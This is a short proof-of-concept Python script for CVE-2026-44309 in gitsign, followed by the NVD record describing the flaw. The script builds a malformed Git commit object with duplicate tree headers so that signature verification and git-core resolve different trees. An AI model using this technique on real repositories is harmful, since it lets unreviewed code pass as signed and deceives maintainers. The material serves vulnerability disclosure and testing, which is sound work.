CVE-2026-44309

# PoC for CVE-2026-44309 # This script demonstrates the creation of a malformed Git commit object # containing duplicate tree headers to exploit the parsing difference. import zlib def create_malformed_git_object(tree_hash_1, tree_hash_2, parent_hash, author_info, commit_msg): """ Creates a raw git commit object with two 'tree' lines. git-core will use tree_hash_1. go-git (used by vulnerable gitsign) will use tree_hash_2. """ # Construct the commit content with duplicate tree headers # The signature must be generated based on the second tree (tree_hash_2) # to pass verification in the vulnerable version. content = f"tree {tree_hash_1}\n" content += f"tree {tree_hash_2}\n" # Duplicate header content += f"parent {parent_hash}\n" content += f"author {author_info}\n" content += f"committer {author_info}\n" content += f"\n{commit_msg}\n" # Git object format: header + content header = f"commit {len(content)}\x00" full_object = header + content # Compress to simulate stored git object return zlib.compress(full_object.encode()) # Example usage: # tree_benign = "abc123..." # The tree go-git sees and signs # tree_malicious = "def456..." # The tree git-core sees and executes # blob = create_malformed_git_object(tree_malicious, tree_benign, ...) # print(f"Malformed object generated. Length: {len(blob)}")

{"cve": {"id": "CVE-2026-44309", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:47.297", "lastModified": "2026-05-15T18:16:25.703", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitsign is a keyless Sigstore to signing tool for Git commits with your a GitHub / OIDC identity. Prior to 0.16.0, gitsign verify and gitsign verify-tag re-encode commit/tag objects through go-git's EncodeWithoutSignature before checking the signature, instead of verifying against the raw git object bytes. For malformed objects with duplicate tree headers, git-core and go-git parse different trees: git-core uses the first, go-git uses the second. A signature crafted over the go-git-normalized form (second tree) passes gitsign verify while git-core resolves the commit to a completely different tree. This breaks the invariant that a verified signature, the commit semantics git-core presents to users, and the object hash logged in Rekor all refer to the same content. This vulnerability is fixed in 0.16.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}, {"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/sigstore/gitsign/security/advisories/GHSA-7rmh-48mx-2vwc", "source": "[email protected]"}, {"url": "https://github.com/sigstore/gitsign/security/advisories/GHSA-7rmh-48mx-2vwc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}